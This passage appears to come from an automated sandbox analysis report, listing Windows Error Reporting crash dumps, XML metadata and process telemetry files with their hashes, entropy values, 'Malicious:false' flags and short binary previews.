.6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Mini DuMP crash report, 16 streams, Thu Jul 25 21:55:45 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):602766
                                    Entropy (8bit):3.6703327588263166
                                    Encrypted:false
                                    SSDEEP:6144:7sjwOPDJM/wuY0+Jy1rqNfo3QZZ65T+c82:7iDJonpc8rqZcQm5TH
                                    MD5:D6DC5CF4227274D6414A6C7BB15411C2
                                    SHA1:68F8395F67EFC6E47DB8A7E1BB73C47F9A464D6E
                                    SHA-256:38FED58BE7D70B16C98382BA6EBFA687C56F66FD680E620505B5224BFDA8C632
                                    SHA-512:CA57EB75AA11965BCB69119EC4D4E5B687C1098686FC83B46A384439135E9C8BCBF9D60D104E8583757F092D6CC05AC6C47E5237DBA55D111EB7BF18E35CC341
                                    Malicious:false
                                    Preview:MDMP..a..... .........f....................................$....(.......'...(......Tt..............l.......8...........T...........P=..>............P...........Q..............................................................................eJ.......R......Lw......................T.......p.....f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):6966
                                    Entropy (8bit):3.729601942719866
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJjjlkGYQ4t61ypDT89bEx8fjMm:R6lXJPlkGYQ4t61bE6f9
                                    MD5:50F039279671BE42D73548469E11051F
                                    SHA1:F041B7EF131943D2176C813752F6A2562F4BC9B9
                                    SHA-256:ABD7154C19A81C7AECCABED1500AD10E68E9BDDCB67CBA8A8601581ABF1ED8CB
                                    SHA-512:F67C858F279E66297D32A7E82859217E075FAD724A7C98A0AA03C1A512E8997EC9BD3BC52569E036737209AE11C96D4D84D9F7DFCBBA40060E3AFD917CE061EC
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.4.8.<./.P.i.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4698
                                    Entropy (8bit):4.464638743797961
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsmJg771I9ZmWpW8VY35Ym8M4JCTEFPuIyq85KL5P2sjuk1d:uIjf8I7yn7V8oJCFIHN2muk1d
                                    MD5:4E780668ACEAC5F385D32FCB9FB1EA7A
                                    SHA1:56295329A17581EE1AE59E60A333072FCD3471AF
                                    SHA-256:EB7384A006F98D568C72B2637D1752EA2A0A520A7E6D5B03D64807414833F012
                                    SHA-512:4B733A52E4A3B6B1811535BC062CE8385237FCFCAE841F78B5C5D30A7AF77AC4377B5289BC162C17B5130131DE157A394967DB9C2039527408BD1A93FA59D77B
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427018" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):88638
                                    Entropy (8bit):3.058990248980445
                                    Encrypted:false
                                    SSDEEP:1536:eSdzks5ME3AUlCWtyBSxH2RqQSO4/crYysPelf:eSdzks5ME3AUlCWtyBSxH2RqQSO4/crV
                                    MD5:0D637B7E0E7BCD70E391F43356B9CFAC
                                    SHA1:906628FEBE9BC5C4412FF4CF38BC8185EF6DDA81
                                    SHA-256:F05756D6B4E9A8C46553E33B02B8CA9F4A54CAE2ECE28326CD6BF14D3D7D819B
                                    SHA-512:0EB106C8D92A38530769EC891944F7E349BC5F36E708BC57859EF9D063EC6776B8BADE7F492DBF99F1AEF2A4B043BA43446D12E01D427E0A64FBC17B0436623D
                                    Malicious:false
                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):13340
                                    Entropy (8bit):2.685563218766665
                                    Encrypted:false
                                    SSDEEP:96:TiZYWB7P9PYiY/WFyHIUYEZNutaiIun8Fw6PyJaT1+MZqo3CIAk3:2ZDfli7KaT1+MZqo3lAk3
                                    MD5:9374FCA172160E071AC18BFFB6BD31CD
                                    SHA1:DC058E84CE21618A46649DE10D0405DBA4F75628
                                    SHA-256:7C1E07BD136FB10D488E6DC4431A6067DDD09770DBA3B33327748490BEA75C0C
                                    SHA-512:53F358AC5EEE09ECC75B63E00B13F3ED4A5A20ACB068C9132B8025717D11BBDBCB80B1654D94BEF552F9526740BF5C0F4C04C21DCEB7B9112AA0D4CEA0EE04D4
                                    Malicious:false
                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Mini DuMP crash report, 16 streams, Thu Jul 25 21:55:38 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):609054
                                    Entropy (8bit):3.664512019016343
                                    Encrypted:false
                                    SSDEEP:6144:VsR1n7MX9JM/cuYiBJy1Yqbfo3QIZ67/Uc8:VW7QJorzb8YqbcQz7/
                                    MD5:64C0A8B53D267E6B6238684597D22FD5
                                    SHA1:98A6FBB7CEB37F81791B1947E6393E8F5949964F
                                    SHA-256:C0F31F46AABA955FAB846F1F07292B51E92FD57B189F74096A45960163D46F9C
                                    SHA-512:DCC6F2089C6D45458D2C6DB64D5BA5B6822E2E6A5D206B5C1C4782F18A8DBBF702111D348C9CB7CCE72C2C4BEFDC70EC2861C76AFF84708882A8C8E5875515A7
                                    Malicious:false
                                    Preview:MDMP..a..... .........f....................................$....(.......'...(......$u..............l.......8...........T............=..~............P...........Q..............................................................................eJ.......R......Lw......................T.......p.....f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Mini DuMP crash report, 16 streams, Thu Jul 25 21:55:40 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):607848
                                    Entropy (8bit):3.6721288383048805
                                    Encrypted:false
                                    SSDEEP:6144:vTi28H42/u4bUKNFUV41l+qsbuC3Qnx6bTR+R:vfw/u4gKNFUOH+qBiQwbTk
                                    MD5:2FC776A6C868C59C7287DF381D4F24DA
                                    SHA1:F97666D3F2F6127D61F2C483B03EDC00D795704F
                                    SHA-256:CB0FF077AC733CBF2FE6460FF425807A2B6FD792D5D2C48C59C6957E95E0D3DE
                                    SHA-512:FE49107AD3933D27E57CAFB3EF322BF799A8C5D4C50A6266F566392803097426C342A491CC73D05F89EF21EF9493D75851CFC7843D12475AAABD7B3BFAB9FB7D
                                    Malicious:false
                                    Preview:MDMP..a..... .........f........................<...........$...0).......'..T)......$t..............l.......8...........T...........P=..............pP..........\R..............................................................................eJ.......R......Lw......................T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):7024
                                    Entropy (8bit):3.7320470093269544
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJjBXi3YZPKEyprOx89bmxGfMim:R6lXJlXyYhFmmwfo
                                    MD5:E1A4032940CEF6558F9698725979DD1D
                                    SHA1:D55D0D827BFD7AF8E932B8158068BA86DCD7152F
                                    SHA-256:E364DE592096EFD46D25B239A5DF3B4268779FEA1EB2825111790C9BDEE065E4
                                    SHA-512:4788AC15770799B3D0823A336299D5FF2A8BC7D325501D42D7D27D57783B43C60CDBE55DEBB4E47255B285B6981A2F8D119F53BDE3F6953F7E6E51B6B78A3D50
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.4.8.<./.P.i.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4793
                                    Entropy (8bit):4.487003025006502
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsmJg771I9ZmWpW8VYboYm8M4JCTE6FPsgzyq8vYEx5P2sjuk1d:uIjf8I7yn7VUJCIisgzW1xN2muk1d
                                    MD5:9DB0F555D723072128FE0C1CF4A25D66
                                    SHA1:0FD02C634330E4BCC80031296B8ACF4AB28F5E45
                                    SHA-256:50A3CE82F97D2C48FA81FB31F50EF453223BFFEB9048A9B4DD8A2D013FC9C58B
                                    SHA-512:44A7E78152F129738BF8A2C72FC6AEA5E7A1D26231F222EEF4D9E7BEFE8AF2BE4E5DA752E65A5DA79061D5E74E95308BB075700EDDFA567AC1EC8F4F805A1821
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427018" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):89052
                                    Entropy (8bit):3.058850390437515
                                    Encrypted:false
                                    SSDEEP:1536:dS69gYf/yZAlefJKUBy/DtUKjH3lkRLQpO4/crYysPelX9G:dS69gYf/yZAlefJKUBy/DtUKjH3lkRLW
                                    MD5:B14A1A8172C8474ADDFE97727BA12513
                                    SHA1:A50174AC9BA7E62E62EA132377326C54750C1783
                                    SHA-256:672929BDCF3D72B4399EBE7F7F8F65014111F7A3722AFFB20D8768B6CB0B5A5C
                                    SHA-512:108DD0DB828EA483955EC758946BAE6B6E4974482DEEFA39F101B1C40D3B0900FD8DAF93BEA491D7E581F55BD87FEA5F134176287C85434E69CD31FCCB9BF6E1
                                    Malicious:false
                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):13340
                                    Entropy (8bit):2.685312355270343
                                    Encrypted:false
                                    SSDEEP:96:TiZYWtqdn6OnwYqYkWn2bHyUYEZYHtaiauj8mwdSvBaX1BM8Fo2Iek3:2ZDBdrcU6BaX1BM8Foxek3
                                    MD5:32C33FF0329121A0FCE33507506248A9
                                    SHA1:7BF3E6D5DBFAE69C57504B4B5CA2C520773DD494
                                    SHA-256:8099C8350EA67AB7DA550F460B4C06FB42963EA18E2547D63DEDB4B37C0FC8E1
                                    SHA-512:3828F80D41900FBEB0826CFA286683C85A2989FB8E08110F28285A18C707E103ADE86DBC05AD617BC8D6E61C0CD01EDBBDC377FDF6FCAD4A93D724F7EE3F4DFD
                                    Malicious:false
                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):9038
                                    Entropy (8bit):3.710421512376928
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJzcz6YZxrkkgmfZPKEyprH89bpIIcwfpDm:R6lXJoz6YPgkgmfhF/pIIDfA
                                    MD5:D998AA6DD1DAF8775A8E85AA9F162659
                                    SHA1:0E67332285A1E13C1BCEA04FCF9AE0FBCD84ACB1
                                    SHA-256:0E38375BF79C1E195940065CDAE1C00BE7E31AAD51E3DFB2C4413991669DFAAD
                                    SHA-512:B153B35993501172A0BA25BB03126A0355B36F1195F3B03C350AFA9C55128F3E92A83AA7C467EF0C72BA0024C10D8FB462E1FAD0425DE6A0E233DF92E334ED12
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.6.4.<./.P.i.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4793
                                    Entropy (8bit):4.484966644963343
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsmJg771I9ZmWpW8VY1Ym8M4JCTE6FMyq8vYEasjukkd:uIjf8I7yn7VxJCI3W1amukkd
                                    MD5:8ADDABE32CBFD3C36C2CC75CE11795C2
                                    SHA1:F9E6EF6F95E7F6C7A371A22675C7FD62B3DA4694
                                    SHA-256:5F007B180E4BA8D11DE8C19A76DE0CDE0D474FCC1F7D44CE91434BA37FA729C2
                                    SHA-512:D4D431C6682A0115F5FA97200E992E5DE24AFF5537D13E0076760E1640938DC83E85A1B40A422F6600454B095264542E66D994223067FC3AA026A6D20A3B1907
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427018" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):89984
                                    Entropy (8bit):3.057857817204726
                                    Encrypted:false
                                    SSDEEP:1536:xl6BfvM+ObkUpyWtXsK9H3aPRuQpO4/crYysPelY7d:xl6BfvM+ObkUpyWtXsK9H3aPRuQpO4/b
                                    MD5:D4ADCDA966CA79AB5627867C4A136934
                                    SHA1:972679890C6F8D167F8C8FC81C2B1D9FCEE4C31A
                                    SHA-256:A7E7A737642E115CE68A97736BA95ED9250596BB6D04759F6C7287B669A26296
                                    SHA-512:A24236540EBEEA29427455DA1E7D644A9291BCD746A2BFCF04824737F41E3E3DA0C76F4CC397A640A834691CA5D801A86FA8EE63B362A315648ECCB664B6FDB2
                                    Malicious:false
